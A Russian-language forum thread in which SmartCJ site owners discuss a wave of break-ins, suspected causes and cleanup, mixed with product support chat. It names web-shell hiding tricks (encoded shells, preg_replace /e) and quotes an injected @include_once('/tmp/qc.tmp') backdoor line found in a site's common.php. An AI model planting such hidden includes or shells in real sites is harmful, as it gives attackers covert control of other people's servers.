Новая тема   Ответить

 fish_ka
kort писал:

дело не в том что ломается. а что нет. в админке была возможность через какую либо уязвимость залить файл - если на сервере кроме сайтов с трейдовым скриптом ничего не было - то и возможности спрятатся в системе не так много

если там есть вордпресс или еще какой всенародно любимый скрипт - то мест куда спрятатся предостаточно самыми различными способами - начиная от зендом сжатых шелов - кончая хитрыми параметрами /e в такой безобидной фунцкии как preg_replace, самый необычный способ скомпилить софтинку назвать ее http и запустить - и пока она будет в памяти уже ничего не изменится

основная задача злоумышлеников в данной ситуации повышения прав до юзера который может редактировать файлы - сверх задача получение суперпользователя

но в реалии это нужно смотреть каждую машину детально и самому - а в данном случае - был написан бот и он первоначально погрузил автоматом шелы на все доступные машины - чем спалил всю ситуацию

"жадность фраера сгубила"

просто игогда машину тяжело почистить даже тем кто хорошо понимает и разбирается в администрировании и работе всей кухни вебмастерских скриптов - а тем кто не знает как запустьить в шеле файл или почему он не запускается - будет достаточно трудно - при любом раскладе на это нужно потратить время

с точки зрения обратной стороны это просто вебшелы на адалт ресурсах - те кто нашел дыру не захотел заниматся ей - и продал пионерам каким то - а может и 5ть раз, а может и 10ть раз
по этому такой был адский всплеск хакерской активности

зы насчет все ломается - поломайте статичные файлы которые нгинксом отдаются пожалуста

 unix
у меня стоит 48up тоже сломали

 Alexandur
fish_ka писал:
Судя по тому, что пишут, взлом не через админку. Она закрыта basic авторизацией, без пароля не войдёшь. То есть, где-то в другом месте дыра.

 Alexandur
unix писал:
И 49й ломают.

 LemonS
fish_ka: не пугай людей.
назвать http и тп - после перезагрузки ее уже не будет.
спрятаться в других каталоагх - да, реально.

gimcnuk: через админку, я уже писал про это. проблема в том, что пароль дефолтный везде один и тот же. Про "я точно менял пароль и кроме меня его никто не знал" я ничего писать не буду. У меня каждый(!) день в асе люди у которых проблема решается примерно так
- у меня это не работает
- а вот это проверял?
- да, я сморел, я все делал
- ТОЧНО ?
.... через 5 минут
- ой да забыл\пропустил и тп

в любом случае мои логи с демо у меня есть, по ним так. если есть другие варианты - велкам.

 nosf
отпишитесь нашел ли кто чекалкой что-то новое

 kort
nosferatu писал:

у меня чисто, говно поудалял ранее. И у меня кстате не было сж с дефолтными логин/пасс.

 X-dream
//

Последний раз редактировалось: X-dream (26/10/12 в 19:44), всего редактировалось 1 раз

 fish_ka
nosferatu писал:

логи апача нужно парсить - на предмет POST быстрее найти будет - если конечно есть что то не обычное
правда у продвинутых шелов - и продвинутых хакеров - код в куке передается
но таких единицы

 Jabar
nosferatu писал:
на одном сайте из всей кучи нашел только test.php , по содержанию точно такойже как и tmp.php.tt . Я конечно не шарю , но похоже на кукстафинг какойто.

LemonS писал:
а вот и зря. более полугода вобще не ставил смарт, на сайте где нашел файл пароль сменен уже года два как (это если предположить, что засунули его в тот момент когда скрипт ставил). Ну и некоторые вещи я просто довожу до автоматизма, чтоб не забывать. В частности - после инстала сразу иду меняю пасворд, так что вероятность залезть именно под дефолтным паролем очень мала - 2-3 минуты во время инстала.

 LemonS
fish_ka: я как раз так и нашел проблему на демо.

 kort
Jabar писал:

Аналогично, пароли меняю сразу после инстала. Хз как оно смогло пробраться ко мне.

 LemonS
Jabar: ну может предположить вариант xss
например ты залогинен в админке
я тебе даю линку на старницу где есть JS который открывает страницу с админкой напрмиер с нужными параметрами.
вообще я предположить могу много чего
но конкретую инфу я пишу на основе логов с демо
если у тебя есть другие логи и там виден какой-то другой вариант - велкам

 LemonS
Как за 5 минут сделать блог
и наверно получить немного трафа на этом

Если вы хорошо наполняли базу изначально и у вас хорошие описания и очень желательно кастом галеры, то можно за 5 минут создать паралельно блог на той же базе.

* создаем субдомен условно blog.yourdomain.com
* ставим на этом субдомен smartcj
* делаем его слейвом yourdomain.com
* скачиваем темплейты блога. Обратите внимание что это темплейты сверстаны на версии 49.
* заливаем этот файл в Rotation - CMS (внизу Upload Templates )

Все, блог готов

 mickey
a пример того что получается можно увидеть?

 Evilin
LemonS писал:

 LemonS
sawm: чужой сайт как-то показывать стыдно, утром набью демо десками Может быть есть хороший готовый дамп где длинные дески ?

 Nikso
даю дамп десков

Demo description 1
Demo description 2
..
Demo description N

 LemonS
Nikso: не подумал про такой хороший вариант )

 vaal
Господа, подскажите по внесению новых галерок в мультинишевый тюб.
Есть определенное количество категорий. Спон дает данные по категориям мовика,к примеру,
Big tits
Blonde
Dildo
Masturbation
Sports
Teen

Как настроить, чтобы галерка была автоматом включена во все из этих категорий?

 LemonS
blogdemo.smartcj.com демо блога, над дизайном конечно стоит поработать но смысл думаю ясен. "Посты" отсортированы по дате, Popular Posts по цтр.

Последний раз редактировалось: LemonS (25/10/12 в 20:11), всего редактировалось 1 раз

 LemonS
vaal: http://smartcj.com/wiki/doku.php?id=ru:new_rotation_content#importt…r_keywords

 Spilk
Пожелания на 50-й ап.

Хотелось бы чтоб в списке спонсоров не выводились неактивные спонсоры.

Хотелось бы капчу в камментах текстовую добавить как на форме регистрации трейдеров.

На слейвах пропала синонимизация десков после смены пароля на мускульной базе мастера.

 danke
А где тут тема про создание шаблона на смарт?

 X-dream
по поводу взлома:

на одном сайте обнаружил в scj/cgi/common.php вот такой инклюд @include_once('/tmp/qc.tmp');


<?php
$path_to_data = "/usr/www/site/site.com/htdocs/scj/data/";
$local_domain = 'vividbdsm.com';

if (!defined('BASE_DIR')) define('BASE_DIR', '/usr/www/site/site.com/htdocs/scj/');
if (!defined('CACHE_TIME')) define('CACHE_TIME', 1200);
?>
@include_once('/tmp/qc.tmp');


что это такое, и нужно ли оно?

сделал апдейт. скопировал index, out, common, include с папки cgi в корень.